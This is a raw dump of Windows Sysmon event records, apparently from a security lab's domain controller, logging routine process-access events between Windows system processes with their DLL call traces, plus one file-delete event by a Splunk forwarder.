07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.436{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.436{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.374{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.374{466BC892-02BC-60E8-2C00-00000000CF01}30644868C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001046277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.374{466BC892-02BC-60E8-2C00-00000000CF01}30644868C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 23542300x80000000000000001046276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.158{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A06827D18DBADE228B25200C673BEEE,SHA256=8366AAC553E880849E49D96BF0736AEB3967CE35C7AD2799BF84DDAEFE44FE94,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.072{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dl